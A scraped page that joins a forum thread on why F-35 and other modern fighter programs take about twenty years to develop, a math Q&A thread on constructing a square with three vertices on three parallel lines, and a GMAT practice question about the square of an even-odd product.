Compared to the F-16, Hornet, Super Hornet, Harrier, A-10, Rafale, Gripen, and F-117, the F-35 is more capable in almost every relevant aspect. It has the best radar, best EW suite (probably), and best IR sensor suite. It has the best range and carries the most payload. It has the "superb low speed handling characteristics and post-stall manoeuvrability" of the Hornet and the acceleration of an F-16 (a 'Hornet with four engines,' remarked one pilot). At equivalent combat loadings, the F-35 is faster and accelerates/climbs more quickly. Sensor fusion and network integration provide excellent situational awareness (perhaps second to only AWACS) and greatly facilitate coordinated strikes.
Even versus the Raptor in air-to-air, it's not clear the F-22 would dominate. Some F-35 systems (the APG-81 radar, ASQ-239 EW suite, AAQ-37 DAS sensors) are direct upgrades of F-22 systems (APG-77, ALR-94, AAR-56). The F-35 radar ground mapping and targeting capability was actually backfitted onto the F-22. The F-35's EW suite has detected and jammed the F-22's radars. It's also twice as reliable and four times cheaper than its predecessor on the F-22. And the F-35's EODAS evolved the F-22's AAR-56 into much more than a missile launch detector, also providing ground-fire geolocation, weapon cueing, and situational awareness IRST (the famous "see through the cockpit floor"). Test pilots and USAF officials have also remarked that the F-35 is stealthier than the F-22.
The F-35 also has an integrated IR search and track system and helmet mounted cueing system. Both were canceled on the F-22. The F-35 will also carry 6 internal AMRAAMs (same as the Raptor) or 4 internal MBDA Meteors.
Development time
• F-16: 2 years for demo (1972-74), 4 years to first flight (1972-76), 8 years to service entry (1972-80)
• F-35: 5 years for demo (1996-2001), 10 years to first flight (1996-2006), 19 years to service entry (1996-2015)
Overall, F-35 development ostensibly took 2.5 times longer than F-16 development. Given the tremendous amount of new technology, it's notable that development time was comparable to other modern fighters, which also average 20 years (see far below) despite being far less technically challenging.
By running a joint program, the JSF eliminated a lot of potentially redundant system RDT&E and reinvested those savings into more advanced systems (and more systems). Eg, instead of designing three different radars, they designed a single (more advanced) radar---avoiding reinventing the same radar twice over, avoiding three separate test and validation programs, and avoiding managing three separate programs.
### #6: Minor points/additions
1.)
I still have great difficulty in accepting that...
A reason would be the complexity of the problem, which is very often quoted. All aerospace problems are extremely complex, that is nothing new. But now nobody can tackle them anymore? That was the basis of my question.
I think the complexity has simply grown faster than the tools' ability to keep pace.
I think with modern tools and processes, it would be very easy to out-design any plane from before 1980.
2.)
You only do these new programs every so often, there's so much of a backlog of stuff you want to get done---you throw too much at it. You want to do all the new technology, all the new manufacturing processes, new tools, new everything all at once. It makes the complexity exponential. [So] You need to find things to advance outside of these programs to get yourself ready for these programs, so when the opportunity comes up... the technologies [will already be] in the market, so you know what you're doing so you can execute... instead of "it's been so long that we need to start at ground zero [with] a new program plan, a new organizational structure, a new teaming"---all that at once makes it hard to execute. - David Kusnierkiewicz, Mission Systems Engineer (NASA), Johns Hopkins University Applied Physics Laboratory. Speaking at AIAA ("Whatever Happened to the Four Year Airplane", @31:00)
Many reasons:
1. Modern aircraft are vastly more complex
• Scale.
• An F-16 weighs as much as an B-25 (9 tonnes). An F-22 (20 tonnes) weighs 60% as much as a B-29 (34 tonnes).
• Software.
• The F-16C had 150,000 lines of code. The F-22 had 2 million lines of code. The F-35 has 8+ million. The F-35's logistics system has 24 million lines of code.
• Automation/software is basically narrow AI, replacing several extra crew members: radar terrain mapping, analyzing ground targets through multiple sensors (optical, IR, radar), automatic target recognition, missile approach and warning, electronic attack, defensive countermeasures, etc.
• Even engine start up is simple, "requiring just three switch selections, one each for the battery, integrated power pack and the engine... Initiated by a button in the cockpit, the [vehicle systems built in test (VS BIT)] self-tests almost every function imaginable on the aircraft... After 90 seconds, if there are no problems, the aircraft declares itself ready for flight" (Mark Ayton).
• In comparison, the SR-71 is practically just an airframe with a camera and jammer.
• Systems
• Systems are much more complicated than the basic structure:
• A "stealthy" low probability of intercept AESA radar, distributed aperture system for missile approach and warning and 4pi steradian observation, helmet mounted display, electro-optical targeting system for IR search and track and ground targeting, electronic warfare suite (which, in the F-35, is reputedly much more complex than even the radar), "stealthy" low probability of intercept and high data rate comms, electro-hydrostatic actuators (each actuator is self-contained rather than relying on an aircraft-wide hydraulics loop), and of course stealth (from the LPI comms, LPI radar, skin, to the nozzle).
• Sensor fusion. Then you must fuse all those sensors and comms together and integrate with the rest of the fleet so that everyone sees the same picture. If a lone drone spots a distant fighter/tank/missile, everyone immediately sees it as well. Sensor fusion is responsible for much of the system/software complexity. But you cannot divorce the systems from the aircraft. They are part and parcel of the 5th generation experience... and thus responsible for the incredible capabilities necessary for the future.
• In other words, much of the complexity is necessary to deliver the requisite capabilities.
2. More development and testing before service entry
• Modern safety standards
• Earlier aircraft entered service before many of their iconic systems were finished. In modern practice, the first few hundred F-16s would still be in development/testing, rather than pushed into service before even the airframe and control laws were completed.
• For example, in just its first few years of service, the F-16 had 50 crashes. It was nicknamed Lawn Dart for a reason. In contrast, the F-35 has had zero crashes and only two Class A mishaps, once when they flew too hard without first breaking in the engine and once when they tried starting the engine with excessive tail wind.
3. The physics are better understood
• The 50s, 60s, and 70s saw a flurry of new designs as new frontiers were explored. These were poorly understood, so as basic knowledge accrued, older designs rapidly became obsolete. And since airframes were relatively simple and manpower high, designs evolved incrementally but continuously (rather than in discontinuous leaps today). Opposite NATO, the Soviets were doing the same and thus engendered continuing competition.
Twenty years is pretty typical for modern aircraft development. The F-22, F-35, Typhoon, Rafale, Hornet (including 8-10 years of YF-17 development), and even PAK FA all took (or will take) about 20 years from start to IOC.
A quick note on the SR-71. It wasn't developed in two years. It was derived from the Lockheed A-12, which flew before that SR-71 mockup was even shown. The A-12 program began in the late 50s, and the J58 engines started development even before that, initially for the P6M strategic flying boat, which first flew in 1955.
A quick note on O2 issues. A lot of high performance jets have had recent hypoxia issues, not just the F-35, including the Hornets, Super Hornets, T-45s, and [infamously] the F-22s. The F-15, U-2, and SR-71 also had their fair share of O2 issues.
• On the software issue: does it have so many lines of code because it must be the multifunction fax-printer-scanner-toaster-wafflemaker from @Criggie's comment? – Koyovis Jun 12 '17 at 1:22
• So if the problem is: aircraft become more and more complex, why is the solution then not: split up the complexity in more airframes, which can each be optimised for their task? – Koyovis Jun 12 '17 at 2:31
• @Koyovis The main reason for "so many lines of code" is "because you can". Processors get faster, memory gets cheaper, so there is no incentive to economise - just stitch together an ever-increasing number of (supposedly) standard and (supposedly) reliable existing packages, and ignore the fact that you often end up with 57 varieties of the same basic functionality. Then, the safety and reliability guys get involved, and insist you write 10 lines of code which serve no more purpose than one, just to meet some box-ticking "quality standard" they invented... – alephzero Jun 12 '17 at 4:59
• A fine answer. Would you mind changing "a/c" to aircraft? I keep wanting to read it as air conditioning. – Nayuki Jun 12 '17 at 17:59
• That number of lines of code scares the hell out of anyone who has ever written code. 24 million lines of code approximately equals 48 million bugs. – Stephen Jun 15 '17 at 23:21
In the age of computerized design, drafting, testing and milling, we can develop products faster than ever before. It's definitely not technology slowing down development.
When we develop a plane for the future, whether it's for the Air Force or commercial aviation, we tend to focus on planning, and developing plans for the future. When Boeing and Airbus developed the 787 and the A380, they both had to forecast into the future the best way to spend their money to meet the demands of today and tomorrow. Each company took a gamble on whether airlines would prefer a hub and spoke model or direct flights. Similar planning happens with the US Air Force. That long-term planning does not always emphasize faster and cheaper.
In the case of the US Air Force they want planes that are fast, advanced and have no match in the sky. Others have mentioned some of the drawbacks and advantages with programs like the F-35, I am going to focus on what can be done today.
My example of the development speed possible is the Textron AirLand Scorpion. This is a composite fighter, designed with off-the-shelf parts, leaning heavily on technology developed for Cessna, who is the actual frame builder. It was designed to be a light attack and intelligence, surveillance and reconnaissance (ISR) platform. It was proposed in 2011 and had its first flight in late 2013 and sells for $20 million for the plane. That's under two years of development. This plane is no match for the F-35 in terms of speed or flexibility. The plane does not do VTOL, carrier landings, the maximum speed it 518 mph, the ceiling is 45,000' and the range is under 3,000 miles. The cost and time for development did not include things like the ejection seat, the flight controls which are borrowed from other developments. If the Scorpion incorporated all of those aspects in development, the price and development time would have increased dramatically. This plane is low cost and can handle training or defense. It shows what could happen in development in the 21st century when you remove a lot of politics, planning and other requirements from plane development and focus on building something low cost, low maintenance and reliable. More information: • An earlier example of a similar concept (cheap, proven technology, no fancy stuff) was the F5 Tiger. – Durandal Jun 15 '17 at 18:03 • Very good point. From the article in The Economist referenced in the question: "Mr Pugh also identified another intriguing trend: the race for bigger, better weapons is fiercest in peacetime but tends to fall once war actually breaks out. At that point, he argues, quantity takes precedence over quality. " – Koyovis Jun 21 '17 at 2:20 • @Koyovis what mostly becomes important in wartime is rapid production of replacement assets to replace those lost in combat. That and ease of use so the system can be used by new recruits with only limited training. You still want to outperform your opponent, but numbers become more important than longevity of a single system as most of those systems won't last decades in wartime, they last days or weeks at best on average. – jwenting Jun 21 '17 at 7:21 This is just an additional point, but a bit more than a comment. In the late 60s there was still a cohort of design/test personnel whose skills and attitudes were formed during WWII and the early stages of the cold war. On the test side, the likes of Chuck Yeager and John Stapp were still active. Their careers were built on taking personal risks of a type that would be unthinkable today. The designers don't tend to be as famous but Alexander Kartveli led the design teams for the P-47 Thunderbolt, the F-84 Thunderjet and the F-105 Thunderchief, and not as a manager but as a designer, having been involved in plenty of earlier designs. How many people have experience of designing multiple aircraft these days? Of course the need to integrate ever-increasing amounts of first electronics, then software increases the complexity. This increases the workforce to a larger-than-optimal size, which further slows things down (especially as it involves subcontracting). • The same arguments apply to civil aviation and space. In all these cases sales consist of small numbers of expensive units, and the risks of failures leading to disaster are high. For smaller, more mundane and commonplace things like cars, it's easier to tweak or evolve existing designs, adding features based on the market; in these cases even multiple failures are unlikely to be catastrophic. – Chris H Jun 12 '17 at 15:15 • The complexity increases even more when politics decides to make the project multi-national. Now you have national egos (on the political side!) hijacking the project at their whim. The result is more duplication of work and endless meetings. Look at Augustine's Law XLVIII where that leads to. – Peter Kämpf Jun 12 '17 at 16:32 • After the TSR2 was cancelled, many British engineers left the company, many even emigrated. So for the next aircraft a lot of new engineers had to start from scratch. (The arrangement for cancelling TSR2 included shredding all drawings and destroying all models and prototypes. It was a political decision.) – RedSonja Jun 19 '17 at 8:30 • @RedSonja your brackets include a good point -- cold war paranoia led to a mindset that discarded hardwon knowledge – Chris H Jun 19 '17 at 8:35 One other factor that has to be considered: The government oversight of military projects has also risen in complexity. The paperwork and approvals necessary are staggering. A good deal of the trouble with the F-35 is changing requirements. Its mission requirements have changed a lot since the early 2000s when the prototype first flew. The 'see-through helmet' was not part of the original prototype. And, to a degree, the global situation changed during the F-35's gestation period. One reason Lockheed was able to develop the P-80, P-104, and U-2 so quickly was - minimal government oversight on those projects, and a simpler situation to deal with. Another reason was Kelly Johnson. • Specifically in the US, Congressional oversight can not be understated. Constantly changing funding availability, directed expenditures (buy X from Y), changing production rates, GAO Audits, investigations over minor performance issues all consume a huge amount of time. And Congress is incapable of dealing with the concept of continual improvement. If it isn't perfect, you can't get approval for full rate production, even if the 'shortcoming' can be fixed downstream with a simple field update. So the program continuously languishes in limited production where everything is more expensive. – Gerry Jun 15 '17 at 16:30 • The F35 program generates something like 10,000 pages of documentation per week. – Hephaestus Aetnaean Jun 17 '17 at 20:08 • And inevitably the red tape which leads to projects taking longer indirectly (through the increased timespan) leads to changing requirements which leads to even more red tape. Both lead to needless expense of a lot more money too, and the cost of a project spirals completely out of control to the point you can buy a single F-35 for the cost of almost a squadron of F-16s yet the aircraft is barely more capable (and that's an optimistic estimate). – jwenting Jun 21 '17 at 7:26 Don't forget the hours (years) of flow simulation , dynamic response, FEA, and other computer simulations that modern vehicles require. These are necessary and good, since they reduce testing cost and ultimately lead to more robust products at a fraction of real-world testing. They're not without their drawbacks (high initial computer cost, software and training, etc.) but on the whole it's much better than building a$40m prototype and watch it crash just because someone forgot to convert lbf to kg.
• True. I wonder why the process takes so lomg though, since the simulation and CFD can be done before the first machine is built. – Koyovis Jun 12 '17 at 22:22
• Yes, but it mostly works the other way. Prior to CFD and CAD analysis, actual wind tunnel tests (many thousands of hours) and static tests had to be done. CFD and CAD are supposed to be a cheaper and faster way of design. Yet the original question asks why doesn't it happen in practice, despite these advances. – Zeus Jun 15 '17 at 0:35
The first jet fighter only had to be better than a none jet fighter.
The next jet fighter only had to be better than the first jet fighter for the single job it was created for.
Lot of different types of military jets were created that were a little bit better then what come before them, for the one task they were designed to do.
Then it was decided that it would be better to have fewer types of jets, and that they had to be able to do everything all the different jets they are replacing could. Then it was decided they had to be better then all jets they were replacing in every way.
As the older jets were still working, getting a “perfect”, “do everything”, “keep even one happy” jet was considered more vital than keeping the design time or cost down….. But then as it took so long, and the next design may not come for anther 20 years, the requirements were increased even more....
Technology-Life-Cycle
In the first decade of the 20th century planes were invented and started flying with piston-engines, in the middle of the century we got the advanced turbofan-engines. Both requried and allowed for a lot of new planes and designs and fast iterations with improvments, because they advanced everything. Bascially we have seen "only" improvements since then, first bigger improvements and now smaller improvements. And improving an already well working thing gets harder and harder over time.
If we get a new game-changer in flying-technolgy we will probably see soon a lot of new planes and a second wave with improved new planes and so on.
Beside that, the already mentioned points are right. Especially the cold-war is over and therefore the need for huge fleets of new planes is small. Computers make everyting comfortable but a lot more complicated. And the customer want a multi-role-planes, which makes things even more complicated.
• Aerospace has always been complicated. What makes present day problems more complicated? – Koyovis Jun 13 '17 at 12:43
• First planes were not built for war, so engineers attached guns and it became more complicated, because you now hit your own propeller (either you sync both or built-in the guns into the wings, which weren't designed for guns...). And it goes on with radar, gps, autopilot, fail-safe-systems, retractable landing-gear and finally the F-35: STOVL -> COMPLICATED^2 – Peter Jun 13 '17 at 14:54
Feature Creep
This has been ongoing for decades: Fewer types for more and more roles. Where military planes were originally designed for a narrow set of missions, there has been the tendency to replace multiple types with a single, multirole type.
Whats makes this so problematic for the designer is that different roles have wildly different requirements on the planes abilities:
• The Navy demands a plane that can operate from their carriers
• The Army demands a plane for the strike/close air support role
• ... and a tank killer, too.
• The Air Force demands an interceptor/air superiority fighter
Now each of these roles has demands that more or less directly conflict the demands of another role. You end up designing a jack of all trades plane, trying to reconcile dash speed, long range, long loiter time, reinforced airframe for carrier use (add folding wings for space), high penetration power anti-tank gun.
To cram all that into a single plane you need to make compromises that will not be ideal. To make up for the shortcomings of the compromise you need to go to the very edge of technology to at least cancel out some of the performance loss that came with the compromise (e.g. you need more engine power because your airframe isn't primarily designed for high speed, you need larger tanks than a pure fighter would need and so on). All this tends to add subsystem after subsystem, complexity and weight.
To counter the ever increasing weight (and airframe size) demanded by all the features, the only choice is to go for as compact and light systems as you can make them. Designing at the very edge of what technology allows, is costly. Nobody has done it before in exactly that way, no industrial supply chain for the desired materials and tools exists. All this adds to developments and procurement cost.
At the same time, your budget is limited for any given fiscal year, if you overrun the budget you'll need to get more budget, which will add burocratic delays and so on. All in all this adds up to steadily increasing cost in both time and money.
• Why then are there not multiple types, each optimised for their own task? – Koyovis Jun 14 '17 at 22:05
• @Koyovis Fewer types simplifiy military logistics and tactics. Need a fighter? Arm as figther. Need strike aircraft? Arm with strike package. The tendency is to do more tasks with fewer units. Financing and burocracy also have some impact, its easier to get one program approved than three. – Durandal Jun 15 '17 at 17:58
• This is the most important answer imho. This is what slows you down. The previous guy sitting in the customer's office wanted a cup holder in pink, now the new guy wants a bottle holder in blue. The new guy earns kudos by finding things the previous guy "got wrong" and coming up with an "improved" version. Sometimes it's just a new fad they saw some NATO partner got. Every one of these changes is waved through by our management - we earn money that way - and dumped on us. This is true of all military manufacture I have ever dealt with. – RedSonja Jun 19 '17 at 8:23
From the software development point of view, F35 has 8M lines of code on its own. 24M lines if you include all related systems. These code themselves takes a long time for developers to work on, not to mention testing them.
• Is that one of the symptoms of lumping all requirements together? – Koyovis Jun 14 '17 at 22:09
• @Koyovis No, little of that software is branch/variant specific. Most runs the core systems like radar, EW, and IR sensors. – Hephaestus Aetnaean Jun 17 '17 at 20:44
• @HephaestusAetnaean which all had to be developed from scratch? – Koyovis Jun 19 '17 at 7:48
• @Koyovis - Better than developing from scratch three separate times. But no, it wasn't all from scratch. Many systems were evolved from prior work and significantly upgraded: radar, EW, EODAS, RAM, and engine (F-22); EOTS (Sniper XR); helmet-mounted display (DASH III/JHMCS); laser IR jammer (NG, various); countermeasures (various); carrier landing system (MAGIC CARPET)... Even if the Navy and Air Force developed their own separate planes, they each would've developed almost all those systems anyway... – Hephaestus Aetnaean Jun 19 '17 at 8:55
• @Koyovis - ...and so would competing nations. They're developing their own IRST, advanced radar/EW/ECM, HMD, stealth materials, etc etc. The F-35 needs to be that advanced in order to stay ahead of the curve and stay there 20-30 years later. A lot of the F-35's core, defining capabilities (stealth+sensor fusion+networking) define 5th gen. You cannot/should not separate them from the aircraft... or any would-be replacement. Penny-wise, pound-foolish. – Hephaestus Aetnaean Jun 19 '17 at 9:06
If you want to get into the specifics, the Government Accountability Office has repeatedly produced reports on the state of the F-35 program and made corresponding recommendations to the DOD, most of which have not been followed. A decent place to start is last year's GAO-16-390 (pdf), “F-35 Joint Strike Fighter: Continued Oversight Needed as Program Plans to Begin Development of New Capabilities”, which starts with a background overview of the history of the program and includes links to previous reports.
Short version: the DOD demanded the F-35 incorporate a raft of new technologies, many of which were not fully understood, and which it was wildly overoptimistic about, then rushed it into testing without adequate R&D and into production without adequate testing; when this was pointed out to them, the DOD spent 2001-2008 in denial and 2009-present reducing procurement and lowering production rates to cope with the resulting cost overruns.
• While requirements for "new technologies, many of which were not fully understood" could be the reason for the long development time of the F-35 it doesn't explain why other aircraft suffer, according to the OP, from the same problem. – mins Jun 15 '17 at 20:50
• The article mentions in the introduction that "...we're nearing end of development." In 2016, 20 years after the contract for development was issued. – Koyovis Jun 15 '17 at 23:02
• It's an interesting read. "As we have previously reported, DOD began the F-35 acquisition program in October 2001 without adequate knowledge about the aircraft’s critical technologies or design. " – Koyovis Jun 15 '17 at 23:38
• "Not fully understood." But that's true of basically any new technology you're developing for 20 years in the future. You can't innovate without risk. – Hephaestus Aetnaean Jun 17 '17 at 21:04
• @Koyovis - Some context: GAO's literal job is oversight/playing devil's advocate. They're never happy with any program---even the most successful ones. From dozens of reports, I think I've seen them give a compliment just once. Of course they say "more oversight is needed." When have they ever said less oversight is needed? It basically amounts to "I don't need a job." --- If you read their past reports on the F16, they say basically the same things. – Hephaestus Aetnaean Jun 17 '17 at 21:29
The answers above have provided very good insight into the issues associated with designing a new fighter jet. The question was particularly about the long development time, twenty years in total. Distilling all answers, a conclusion may be reached, but I'd first like to address some of the particular items raised.
To start with what I don't reckon the issue is, based on order-of-magnitude comparisons:
• Not stealth. The F-35 is compared with the F-16 with regard to observation by radar. This video mentions how stealth was incorporated into the SR-71 already - the SR-71 of the question! Stealth technology is over half a century old! A bit further on in the clip it is mentioned that the SR-71 has a radar signature 100 times smaller than that of an F-14, which is half the size.
• Not: ever increasing better arms of the adversary. Arms races and their consequences in times of the American civil war were already mentioned by Jules Verne in his 1865 book From The Earth To The Moon. Again in the video referenced above, the weapons officers are describing jamming the radar of weapons systems locking on to their plane. The ever increasing arms race has been an ever increasing issue for over 150 years. Yes the issues are growing faster, but the solutions are standing on the shoulders of ever growing giants.
• Not: the number of software Lines Of Code. Although a bug in aeronautical/ weapons systems software has graver consequences than a bug in Microsoft Office, it is not the number of lines per se. The F-35 has 8 Million Lines Of Code (MLOC) on board, comparable to a Chevy Volt. F-35 logistics has 24 MLOC, comparable to Apache Open Office. That represents a sizeable amount of man hours and development time - implemented incrementally, like the weapons systems are. Aeronautical and weapons systems software
• Not: the problems being so complex. It's aerospace! The question boils down to: why could incredibly complex, novel problems be solved so much faster in the past. Yes the mission of the SR-71 was flying fast with a camera, while not being shot down by whichever advanced weapon available. Apollo 11 only had one mission as well, what has that got to do with the price of fish? It was accomplished in eight years, less than half the time required to put the F-35 into service.
What then does contribute to the long development time? The question compares the present day situation with over half a century ago, when full scale warfare between nations was still a vivid memory, and nations were still armed to the teeth. The high tech nations have fortunately not been waging war with each other ever since.
This article which appeared in a 2010 issue of The Economist adresses the increasing cost of weapons systems. A quote:
Philip Pugh, author of “The Cost of Seapower”...also identified another intriguing trend: the race for bigger, better weapons is fiercest in peacetime but tends to fall once war actually breaks out. At that point, he argues, quantity takes precedence over quality.
So one can conclude that it's a peace-time general trend in all weapons systems that they should be perceived as superior. Not tested by war, their deterrent value may be as important as their actual destroying capability. And that is a good thing.
The F-35 turns out to defeat Augustines law XVI: In the year 2054, the entire defense budget will purchase just one aircraft. This aircraft will have to be shared by the Air Force and Navy 3-1/2 days each per week except for leap year, when it will be made available to the Marines for the extra day. I greatly enjoyed learning about Augustine's laws from @Peter Kämpf's answer - it looks though as if he was just signalling an age old peace time trend.
Like stated in the end bit of the OP question, I don't want to knock the end product, the F-35, which ultimately turns out to be a competent weapon that defeats wider cost increase trends. But why did it take so long, and why did it accumulate such bad press in the process?
Opinion ahead
It is clear that all factors that were driving urgency are not present anymore, which is a good thing. It is much easier to live in peaceful times. Also, the enemies became a-symmetrical and different sorts of weapons were required. We don't have the fire breathing program managers anymore, bred by war-time development of ever better weapons. Like Kelly Johnson, who's record does not cease to amaze. He developed the Starfighter in 1 year, nine years after WWII with its Spitfires.
It may just be that fast jet development is in a dormant stage now and that everybody understands that. It's a good thing that the capability is kept afloat. The F-35 will turn out to be a good and cost effective machine, that just took a while longer to develop. What's two decades in a lifetime, right?
• Apollo was a success despite, not because of, NASA. When NASA got involved, you had cost overruns and deadly accidents. Only by leaving most of the work to contractors and directing them at arm's length could the program succeed. The prime reasons for success was a clear motivation of all involved (Beat the Russians!) and a clear goal (man on the moon by the end of the decade). In todays projects, motivations are diverse (let's try to blame the other guy, mostly) and goals even more. This is actually good, because it shows that threats have vanished. – Peter Kämpf Jun 24 '17 at 9:15
• The F-35 is compared with the F-16 with regard to observation by radar. The F-35 is actually much stealthier than the F-16 and apparently even stealthier than the F-22. If you'd like, I can dig up some pilot and program officials' testimonials. – Hephaestus Aetnaean Aug 9 '17 at 16:14
• the SR-71 has a radar signature 100 times smaller than that of an F-14, which is half the size. The comparison is a little unfair. • A) The SR-71 actively tried to lower its RCS. The F-14 didn't even bother. It's very easy to balloon your RCS if you're not careful, and back then people simply didn't care [most thought RF VLO was impossible, so why bother]. In LO terms, a 100x reduction is relatively easy to gain/lose. – Hephaestus Aetnaean Aug 9 '17 at 19:53
• B) A mach 3 recon platform is naturally stealthier [than a fleet defense fighter]: streamlining and thermal loads alone demand a very clean skin, unblemished by external stores, pylons, pods, large control surfaces, huge bubble canopies, etc… unlike the "dirty" F-14 whose entire raison d'etre was lugging around 1000 lb missiles. – Hephaestus Aetnaean Aug 9 '17 at 19:54
• @HephaestusAetnaean some fair points there, I'll amend the answer. – Koyovis Aug 9 '17 at 23:01
|
|
# “Given three parallel straight lines. Construct a square three of whose vertices belong to these lines.” Are all three lines required?
Given three parallel straight lines. Construct a square three of whose vertices belong to these lines.
What does "belongs" mean in the context of this question? Do the three lines have to be used to construct the square?
• As stated, the condition is ambiguous, so perhaps one can argue that there's a "trivial" solution with two vertices on one line and two vertices on another line. However, it is almost-certianly the intention of the problem that each line contains (at least) one vertex. – Blue Feb 19 at 22:22
• Oh, and there's another trivial solution: two opposite vertices on one line, and one vertex on another line. :) – Blue Feb 19 at 22:34
• Probably the lines have to have the same distance between them. – NoChance Feb 19 at 22:43
• @NoChance: Same distances aren't necessary. – Blue Feb 19 at 22:45
• @Blue, it would be nice if you could provide a quick sketch...Thanks. – NoChance Feb 19 at 22:46
We are going to show two solutions, one geometric and the other algebraic :
Geometric solution :
Yes, the 3 lines are required. Consider the following figure :
Fig. 1.
Take any point $$O$$ on the line which is in-between the two others, called extreme lines. Define $$A$$ and $$A'$$ as the perpendicular projections of $$O$$ on these extreme lines. Let $$d'=OA$$ and $$d=OA'$$. Let $$B$$ and $$B'$$ be the points on the two extreme lines such that $$AB=d$$, and $$A'B'=d'$$, taken in the same direction (see remarks below). let us establish that :
$$B,O,B'$$ are solution points for this problem.
Proof : Triangles $$OAB$$ and $$OA'B'$$ are isometrical right triangles ; thus they possess complementary acute angles $$\alpha$$ and $$\beta$$ (see remarks below) with
$$\alpha+\beta=90° \tag{1}.$$
Consider flat angle $$A'OA$$. We can write, with the notations given in the figure :
$$\text{angle} \ A'OA \ = \ \alpha+\beta+\gamma \ = \ 180°$$
Using (1), we deduce that $$\gamma=90°$$. As the hypotenuses are equal, i.e., $$OB=OB'$$, the rectangle that can be built on $$OB$$ and $$OB'$$ is a square.
Remarks : 2 more rigorous definitions :
1) "taken in the same direction" means that $$\vec{AB}=k \vec{A'B'}$$ with $$k>0$$.
2) $$\alpha$$ could be formally defined as the acute angle such that $$\tan(\alpha)=d/d'$$.
Other remarks :
1) The above figure is reminiscent of the (now classical) proof of Pythagoras' theorem : see for example http://qed.sbytes.com/pythagoras.
2) There are two other solutions (@greedoid has found one of them, and I am grateful to her/him to have pointed in this direction). Let us recall that figure 1 was based on a right triangle with legs $$(d,d')$$. But using an auxiliary (dotted) line whose definition we leave to the reader, we get triangles with legs $$(d+d',d)$$ (Fig. 2) and $$(d+d',d')$$ (Fig. 3).
Fig. 2.
Fig. 3.
Algebraic solution :
Consider that coordinate axes have been chosen in such a way that the current points on the different lines are resp.
$$A_0(x_0,a), \ \ A_1(x_1,b), \ \ A_2(x_2,c).$$
with $$a,b,c$$ fixed. As the issue is translation invariant, one may assume WLOG that $$x_0:=0$$.
The constraint of the problem are twofold :
$$\begin{cases}\|\vec{A_0A_1}\|^2=\|\vec{A_0A_2}\|^2\\ \vec{A_0A_1} \perp \vec{A_0A_2} \end{cases}\tag{*}$$
As $$\vec{A_0A_1}=\binom{x_1}{u}$$ and $$\vec{A_0A_2}=\binom{x_2}{v}$$ with
$$u=:b-a$$ and $$v:=c-a$$, we can transform (*) into the following system of 2 equations with 2 unknowns :
$$\begin{cases}x_1^2+u^2=x_2^2+v^2\\ x_1x_2+uv=0\end{cases}\tag{**}$$
This system has clearly two solutions
$$\begin{cases}x_1=u\\ x_2=-v \end{cases} \ \ \text{and} \ \ \begin{cases}x_1=-u\\ x_2=v \end{cases} \tag{***}$$
and there are no other solutions because system (**) is equivalent to a quadratic equation which has but 2 solutions.
Result (***) is in complete agreement with any of the 3 solutions found in the geometrical solution.
What we have done for one of the straight lines can be done for any of the two others (we haven't made any assumption on the order of numbers $$a,b,c$$) : this explains why we have 3 essentially different solutions.
• This is a bit complex for me. I was wondering what implies that the angle BOB' is a 90-degrees? – NoChance Feb 20 at 10:51
• Angle AOA' is a flat angle (180°). If you subtract from it angles AOB ($\alpha$ degrees) and A'OB' ($90° - \alpha$), what remains is angle BOB' = $180°- (\alpha+90°-\alpha)=90°$. Remark : conversion degrees - radians is done using $\frac{\pi}{2}=90°$. – Jean Marie Feb 20 at 11:08
• Thanks for your clarification. What I meant to ask is, the steps used in the construction of the square don't imply that BOB' is 90 degrees or that $A'OB'=\frac{\pi}{2}-\alpha$ – NoChance Feb 20 at 11:35
• No, all what I do is to construct right triangles OAB and OA'B' which are identical triangles, thus with say the most acute angle $\alpha$, and the less acute angle $(90°-\alpha)$ for both of them. Nothing more. Of course, I have, afterwards, completed my drawing by displaying the "finished" square. – Jean Marie Feb 20 at 11:42
• I have added an algebraic solution. – Jean Marie Feb 24 at 14:46
HINT: see diagram below to find that side $$l$$ of the square is equal to $$\sqrt{a^2+b^2}$$.
EDIT. As pointed out by greedoid, there are two more solutions:
First case, $$A$$ is on inner line (left picture). Since the rotation of $$B$$ for $$90^{\circ}$$ around $$A$$ takes $$B$$ to $$D$$ so it takes line which has $$B$$ to new line which cuts the other outher line in $$D$$.
Second case, $$A'$$ is on outer line (right picture). Since the rotation of $$A'$$ for $$90^{\circ}$$ around $$D'$$ takes $$A'$$ to $$C'$$ so it takes line which has $$A'$$ to new line which cuts inner line in $$C'$$.
• [+1] I hadn't thought to this second solution. – Jean Marie Feb 21 at 0:08
• There is a third solution where the right angle is situated on the third line. – Jean Marie Feb 22 at 10:43
A vertex is a point. A line is a set of points. The problem asks of you to construct a square such that the given lines "pass through" three vertices of the square.
• Good. A drawing would help. – NoChance Feb 19 at 22:40
Let $$l$$, $$k$$ and $$m$$ be given parallel lines such that $$k$$ placed between $$l$$ and $$m$$.
For example, see the Aretino's picture.
Let m be the upper line, k be the middle line and l be the lower line.
Let $$A\in k$$ and $$R^{90^{\circ}}_A$$ be a rotation around $$A$$ by $$90^{\circ}.$$
Now, let $$R^{90^{\circ}}_A(l)\cap m=\{B\}$$ and $$R^{-90^{\circ}}_A(m)\cap l=\{D\}$$.
Thus, $$AB\perp AD$$ and $$AB=AD$$.
Can you end it now?
• Can down-voter explain me why he made it? – Michael Rozenberg Feb 20 at 8:31
• @greedoid It was your down-voting? – Michael Rozenberg Feb 20 at 8:39
• Your solution is incomplete and very hard to read. Also, how you came up with those rotations? Fix that and I will upvote. – Aqua Feb 20 at 10:21
• @greedoid I fixed, but you can say me before and I am ready to explain. – Michael Rozenberg Feb 20 at 10:42
• Basicly you change nothing, also this problem has 2 nocongruent solutions. – Aqua Feb 20 at 10:47
|
|
It is currently 22 Feb 2018, 02:25
### GMAT Club Daily Prep
#### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email.
Customized
for You
we will pick new questions that match your level based on your Timer History
Track
every week, we’ll send you an estimated GMAT score based on your performance
Practice
Pays
we will pick new questions that match your level based on your Timer History
# Events & Promotions
###### Events & Promotions in June
Open Detailed Calendar
# An even and an odd integer are multiplied together. Which of the follo
Author Message
TAGS:
### Hide Tags
Math Expert
Joined: 02 Sep 2009
Posts: 43862
An even and an odd integer are multiplied together. Which of the follo [#permalink]
### Show Tags
17 Apr 2015, 03:48
00:00
Difficulty:
5% (low)
Question Stats:
81% (00:40) correct 19% (00:32) wrong based on 109 sessions
### HideShow timer Statistics
An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
Kudos for a correct solution.
